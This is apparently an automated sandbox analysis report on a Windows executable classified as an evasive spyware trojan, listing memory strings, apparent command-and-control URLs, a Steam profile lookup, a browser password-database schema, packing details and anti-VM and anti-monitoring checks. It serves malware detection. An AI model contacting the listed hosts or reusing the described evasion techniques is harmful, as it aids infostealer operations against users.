                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1592981595.00000000057D3000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1519093027.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518843947.00000000057FF000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1518974641.00000000057FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1591591909.00000000057D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1593068809.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566379520.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599605647.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495521986.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/9
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566708973.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1567527406.00000000057D7000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1565923725.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566258618.00000000057D4000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1566708973.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiaLxz
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apill
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1517343643.0000000000E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apipt
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1672980605.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000002.1673929346.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/m/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626755261.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643372396.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1643550627.0000000000E5D000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495521986.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495218913.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1623931109.0000000000E5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piA
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000002.1673742160.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1599230927.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1672776832.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1626918311.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apirofiles/76561199724331900
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prisonyfork.buzz:443/apia
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scentniej.buzz:443/api
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.10:49700 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49701 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49702 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49703 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49705 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49707 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.10:49710 version: TLS 1.2

                System Summary

                Source: hx0wBsOjkQ.exe Static PE information: section name:
                Source: hx0wBsOjkQ.exe Static PE information: section name: .idata
                Source: hx0wBsOjkQ.exe Static PE information: section name:
                Source: hx0wBsOjkQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: hx0wBsOjkQ.exe Static PE information: Section: ZLIB complexity 0.9996234170751634
                Source: hx0wBsOjkQ.exe Static PE information: Section: lzvphivs ZLIB complexity 0.9948883056640625
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Code function: 0_2_00412070 CoCreateInstance,0_2_00412070
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: hx0wBsOjkQ.exe, 00000000.00000003.1541990140.00000000057EC000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1519680206.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1541780338.00000000057F9000.00000004.00000800.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1519293770.00000000057E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: hx0wBsOjkQ.exe Virustotal: Detection: 53%
                Source: hx0wBsOjkQ.exe ReversingLabs: Detection: 57%
                Source: hx0wBsOjkQ.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File read: C:\Users\user\Desktop\hx0wBsOjkQ.exe
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: hx0wBsOjkQ.exe Static file information: File size 1810944 > 1048576
                Source: hx0wBsOjkQ.exe Static PE information: Raw size of lzvphivs is bigger than: 0x100000 < 0x190000

                Data Obfuscation

                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Unpacked PE file: 0.2.hx0wBsOjkQ.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lzvphivs:EW;rnhdfjfr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lzvphivs:EW;rnhdfjfr:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: hx0wBsOjkQ.exe Static PE information: real checksum: 0x1bccd8 should be: 0x1c4328
                Source: hx0wBsOjkQ.exe Static PE information: section name:
                Source: hx0wBsOjkQ.exe Static PE information: section name: .idata
                Source: hx0wBsOjkQ.exe Static PE information: section name:
                Source: hx0wBsOjkQ.exe Static PE information: section name: lzvphivs
                Source: hx0wBsOjkQ.exe Static PE information: section name: rnhdfjfr
                Source: hx0wBsOjkQ.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Code function: 0_3_057C7B9E push ebx; iretd 0_3_057C7BA9
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Code function: 0_3_00E7413C push ds; retf 0_3_00E74144
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Code function: 0_3_00E79AD4 pushad ; ret 0_3_00E79AE1
                Source: hx0wBsOjkQ.exe Static PE information: section name: entropy: 7.978175791647224
                Source: hx0wBsOjkQ.exe Static PE information: section name: lzvphivs entropy: 7.954180945897147

                Boot Survival

                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D39ED second address: 5D3A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E4B29226h 0x00000009 rdtsc
